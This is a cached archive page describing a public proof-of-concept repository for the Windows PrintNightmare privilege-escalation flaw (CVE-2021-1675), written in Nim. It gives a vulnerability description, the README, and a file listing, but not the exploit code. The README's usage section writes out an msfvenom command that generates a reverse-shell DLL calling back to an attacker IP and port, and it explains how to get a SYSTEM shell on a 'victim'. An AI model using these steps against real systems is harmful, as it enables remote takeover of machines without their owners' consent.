CVE-2021-1675 PoC — Microsoft Windows Print Spooler Components 安全漏洞

Source

https://github.com/eversinc33/NimNightmare

Associated Vulnerability

Title:Microsoft Windows Print Spooler Components 安全漏洞 (CVE-2021-1675)
Description:Microsoft Windows Print Spooler Components是美国微软（Microsoft）公司的一个打印后台处理程序组件。 Microsoft Windows Print Spooler Components存在安全漏洞。以下产品和版本受到影响：Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for AR

Description

CVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)

Readme

# CVE-2021-1675 LPE PoC

not my exploit! just wanted to play around with the `winim` library in nim.

### Usage

Generate DLL payload with `msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.8.237 LPORT=4444 -f dll > msfvenom.dll`, then start the handler on your attacker.

On the victim run `.\nimnightmare.exe <ABSOLUTE_PATH_TO_DLL>` and get a shell as SYSTEM.

![](./img.png)

File Snapshot


 [4.0K]  /data/pocs/6d6b6ba627e3ca44bf5dd5b84e4cfdc0e8216e9d
├── [476K]  img.png
├── [  88]  make.ps1
├── [1.4K]  nimnightmare.nim
└── [ 393]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!